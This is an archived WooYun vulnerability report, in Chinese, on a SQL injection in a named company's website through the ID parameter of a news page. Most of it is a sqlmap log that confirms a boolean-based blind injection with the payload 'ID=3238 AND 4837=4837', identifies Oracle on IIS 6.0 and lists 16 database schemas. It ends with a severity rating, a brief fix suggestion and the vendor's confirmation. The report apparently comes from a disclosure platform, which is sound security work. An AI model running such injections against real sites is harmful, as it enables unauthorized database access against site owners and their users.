乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-09: 细节已通知厂商并且等待厂商处理中 2015-08-09: 厂商已经确认,细节仅向厂商公开 2015-08-19: 细节向核心白帽子及相关领域专家公开 2015-08-29: 细节向普通白帽子公开 2015-09-08: 细节向实习白帽子公开 2015-09-23: 细节向公众公开
听说厂家很活跃
http://www.dfmg.com.cn/EN/NewsDetail.aspx?ID=3238
and 1=1 1=2 简单判断
[22:28:35] [INFO] resuming back-end DBMS 'oracle' [22:28:36] [INFO] testing connection to the target URL[22:28:39] [WARNING] reflective value(s) found and filtering outsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=3238 AND 4837=4837---[22:28:39] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[22:28:39] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[22:28:39] [INFO] fetching database (schema) names[22:28:39] [INFO] fetching number of databases[22:28:39] [INFO] resumed: 16[22:28:39] [INFO] retrieving the length of query output[22:28:39] [INFO] retrieved: 6[22:28:47] [INFO] resumed: CTXSYS[22:28:47] [INFO] retrieving the length of query output[22:28:47] [INFO] retrieved: 4[22:28:59] [INFO] resumed: JBPM[22:28:59] [INFO] retrieving the length of query output[22:28:59] [INFO] retrieved: 5[22:29:12] [INFO] resuming partial value: M[22:29:52] [INFO] retrieved: MDSYS [22:29:52] [INFO] retrieving the length of query output[22:29:52] [INFO] retrieved: 3[22:30:32] [INFO] retrieved: ODM [22:30:32] [INFO] retrieving the length of query output[22:30:32] [INFO] retrieved: 7[22:31:32] [INFO] retrieved: ODM_MTR [22:31:32] [INFO] retrieving the length of query output[22:31:32] [INFO] retrieved: 7[22:32:35] [INFO] retrieved: OLAPSY@ [22:32:35] [INFO] retrieving the length of query output[22:32:35] [INFO] retrieved: 6[22:33:41] [INFO] retrieved: ORDSYS [22:33:41] [INFO] retrieving the length of query output[22:33:41] [INFO] retrieved: 5[22:34:34] [INFO] retrieved: OUTLN [22:34:34] [INFO] retrieving the length of query output[22:34:34] [INFO] retrieved: 8[22:35:45] [INFO] retrieved: PERFSTAT [22:35:45] [INFO] retrieving the length of query output[22:35:45] [INFO] retrieved: 4[22:36:28] [INFO] retrieved: RMAN [22:36:28] [INFO] retrieving the length of query output[22:36:28] [INFO] retrieved: 5[22:37:22] [INFO] retrieved: SCOTT [22:37:22] [INFO] retrieving the length of query output[22:37:22] [INFO] retrieved: 3[22:37:57] [INFO] retrieved: SYS [22:37:57] [INFO] retrieving the length of query output[22:37:57] [INFO] retrieved: 6[22:38:56] [INFO] retrieved: SYSTEM [22:38:56] [INFO] retrieving the length of query output[22:38:56] [INFO] retrieved: 5[22:39:48] [INFO] retrieved: WKSYS [22:39:48] [INFO] retrieving the length of query output[22:39:48] [INFO] retrieved: 5[22:40:35] [INFO] retrieved: WMSYS [22:40:35] [INFO] retrieving the length of query output[22:40:35] [INFO] retrieved: 3[22:41:19] [INFO] retrieved: XDB available databases [16]:[*] CTXSYS[*] JBPM[*] MDSYS[*] ODM[*] ODM_MTR[*] OLAPSY@[*] ORDSYS[*] OUTLN[*] PERFSTAT[*] RMAN[*] SCOTT[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS[*] XDB
waf+过滤
危害等级:中
漏洞Rank:5
确认时间:2015-08-09 00:54
感谢提醒!
暂无